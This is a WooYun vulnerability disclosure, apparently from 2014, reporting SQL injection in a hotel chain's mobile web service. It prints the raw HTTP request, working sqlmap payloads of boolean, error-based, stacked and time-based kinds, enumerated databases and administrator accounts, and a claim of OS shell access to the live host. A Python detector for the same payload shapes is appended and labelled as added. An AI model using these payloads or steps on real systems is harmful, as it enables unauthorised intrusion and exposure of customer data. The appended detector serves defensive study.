WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2014-02-13: Details were reported to the vendor and are awaiting the vendor's handling. 2014-02-23: The vendor has actively ignored the vulnerability; details are disclosed to the public.
SQL injection
http://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=getCustInfo is vulnerable to SQL injection.
POST /mobileInterface/Super8Interface.asmx/getCustInfo HTTP/1.1
Host: www0.super8.com.cn
Proxy-Connection: keep-alive
Content-Length: 19
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www0.super8.com.cn
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=getCustInfo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: _ga=GA1.3.576428575.1392259674; __ozlvd1031=1392266610; Hm_lvt_f9811dfd07fecd5f46d92b0f29d344e7=1392259675; Hm_lpvt_f9811dfd07fecd5f46d92b0f29d344e7=1392266611; arp_scroll_position=634

cardNo=300976300%27
SQL injection
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cardNo
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cardNo=300976300' AND 1257=1257-- ODsg

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cardNo=300976300' AND 3358=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHAR(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3358=3358) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(99)+CHAR(113)))-- tqxg

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cardNo=300976300'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cardNo=300976300' WAITFOR DELAY '0:0:5'--
---
[16:09:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
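Added example, not part of the original report: a Python check that URL-decodes POST bodies sent to the getCustInfo endpoint and flags the four MSSQL payload shapes sqlmap listed above, plus any cardNo that is not a plain number (that cardNo must be numeric is an assumption; the sample bodies are constructed to mirror the probe and payloads in the report).

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Signatures for the four technique families sqlmap reported for cardNo.
# Each regex runs on the URL-decoded parameter value, case-insensitively.
SIGNATURES = {
    "time-based / stacked (WAITFOR DELAY)": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "error-based (CONVERT(INT,(SELECT ...)))": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(?\s*select\b", re.I),
    "boolean-based blind (' AND n=n)": re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
    "comment terminator (--)": re.compile(r"--\s*\w*\s*$"),
}

# Allow-list of what each parameter of getCustInfo should look like.
# The report only shows cardNo; treating it as purely numeric is an assumption.
EXPECTED_FORMAT = {
    "cardNo": re.compile(r"^\d{1,20}$"),
}

def classify_value(param: str, value: str) -> list:
    """Return every finding for one decoded parameter value."""
    hits = [name for name, pat in SIGNATURES.items() if pat.search(value)]
    expected = EXPECTED_FORMAT.get(param)
    if expected and not expected.fullmatch(value):
        hits.append("value violates expected format")
    return hits

def scan_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body and map each
    parameter name to the findings for its value(s); {} means clean."""
    findings = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = classify_value(param, value)
            if hits:
                findings.setdefault(param, []).extend(hits)
    return findings

# Constructed sample bodies shaped like the probe and payloads shown above.
SAMPLE_BODIES = [
    "cardNo=300976300",                                        # legitimate lookup
    "cardNo=300976300%27",                                     # the single-quote probe
    "cardNo=300976300%27+AND+1257%3D1257--+ODsg",              # boolean-based blind
    "cardNo=300976300%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--",  # stacked / time-based
    "cardNo=300976300%27+AND+3358%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29--+tqxg",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(f"{unquote_plus(body)!r:<62} -> {scan_form_body(body) or 'clean'}")
```

The bare-quote probe is caught only by the format allow-list, which is why per-parameter format checks matter more than signature matching.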
An os-shell can be obtained.
Had a look around.
It is the same page as WooYun: Super 8 Hotels leaks a large amount of user data and order information at some location.
dbs
available databases [16]:
[*] bidata
[*] crs_report
[*] distribution
[*] importcard20130412
[*] ipegasus3
[*] ipegasus_history
[*] ipegasus_mirro
[*] ipegasus_report
[*] iPegasusWeb
[*] master
[*] model
[*] msdb
[*] tempcard
[*] tempcard2
[*] tempcard3
[*] tempdb
roles
database management system users roles:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] bi (administrator)
[*] crs
[*] crs2
[*] distributor_admin (administrator)
[*] pms
[*] sa (administrator)
[*] super8admin (administrator)
[*] super8web (administrator)
[*] super8webadmin (administrator)
os-shell
Browsing
Not sure what this one does.
Did not dump the database or download files; the cookies are all pasted above, hand on heart.
Check
Severity: No impact, vendor ignored
Ignored at: 2014-02-23 16:33
Vulnerability Rank: 12 (WooYun rating)
None yet